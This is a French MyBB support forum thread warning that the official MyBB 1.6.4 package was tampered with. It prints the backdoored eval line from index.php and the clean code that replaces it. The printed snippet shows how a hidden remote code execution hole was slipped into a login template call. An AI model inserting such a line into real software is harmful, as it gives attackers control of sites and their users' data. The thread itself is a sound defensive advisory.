1. IMPORTANT : Nouvelles mesures de sécurité - 2. Règles pour obtenir de l'aide dans les forums de support - 3. Restrictions des droits pour le groupe "Support suspendu"

Il est obligatoire de respecter les Règles de MyBB.fr : Version abrégée ou Version complète pour obtenir du support sur nos forums.

Les membres ayant un site/forum contrevenant aux règles de MyBB.support seront placés dans le groupe "Support suspendu" et ne bénéficieront plus du support du staff. Nous recommandons aux autres membres d'agir de même. Il ne s'agit pas d'un bannissement, le membre retrouvera son statut "normal" dès que sa situation sera conforme aux règles.

Nouveau : un Wiki en français : plus de détails.
Avant de soumettre votre problème, consultez-le, ainsi que la FAQ, sans oublier le moteur de recherche interne.


Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Mybb 1.6.4 potentielle faille de sécurité
Tags » mybb, 164, potentielle, faille, sécurité
01-11-2011, 16:23,
#1
Mybb 1.6.4 potentielle faille de sécurité
Bonjour à tous,

J'ai lu la nouvelle en regardant s'il n'existait pas de nouvelles mises à jour pour mon forum, et ça m'a étonné de ne pas voir de message à ce sujet ici, donc par prévention je vais quand même le signaler.

Il y a environ 1 mois (le 5 octobre), une faille de sécurité a été découverte sur mybb 1.6.4. Il s'agirait en réalité d'une personne tiers qui a réussi à modifier le fichier index.php sur les serveurs officiels de Mybb.com, et ce, dans le but d'y ajouter un code malicieux facilitant le hacking des forums. Tout le monde n'est pas touché, et les installations proposées sur ce forum ne le sont pas, mais bon, si vous avez téléchargé votre installation sur le site officiel anglais, il vaut mieux vérifier que vous avez les bons scripts.

Pour cela, allez dans index.php et recherchez le code suivant :
Code:
//Checks to make sure the user can login; they haven't had too many tries at logging in.
    //Function call is not fatal
    if(login_attempt_check(false) !== false)
    {
        eval("\$loginform = \"".$templates->get("index_loginform")."\";".@$col[23]);
    }

Si vous le trouvez, c'est que vous êtes "infectés", et pour régler le problème, remplacez simplement ce petit code par celui-là :

Code:
//Checks to make sure the user can login; they haven't had too many tries at logging in.
    //Function call is not fatal
    if(login_attempt_check(false) !== false)
    {
        eval("\$loginform = \"".$templates->get("index_loginform")."\";");
    }

Pensez à vérifier toutes vos installations, par exemple mon forum en lui-même n'était pas touché, mais mon installation en local l'était. Il suffit juste que les fichiers soient échangés et tout se retrouve infecté.

Sources => Ici (25 octobre) et ici

Voilà, voilà, je signalais juste au cas où, à bientôt.
Reply
01-11-2011, 19:50,
#2
RE: Mybb 1.6.4 potentielle faille de sécurité
Merci pour l'info.

Rassurez-vous, les packs ici ne sont pas concernés par cette infection.
Mais pour ceux qui ont téléchargé le version anglaise dans le mois précédent feraient bien de vérifier ce fichier index.php !

[Image: spyto.png]
~~ AUCUNE AIDE Par MP, MAIL OU MSN !!!~~
Reply
05-11-2011, 2:15,
#3
RE: Mybb 1.6.4 potentielle faille de sécurité
Dans le pire des qu'a il suffit de re télécharger mybb du site anglais et de remplacer lindex .
Reply




Users browsing this thread: 1 Guest(s)

Contact Us | MyBB.support | Return to Top | Return to Content | Lite (Archive) Mode | RSS Syndication
 Translation utility provided by Regentronique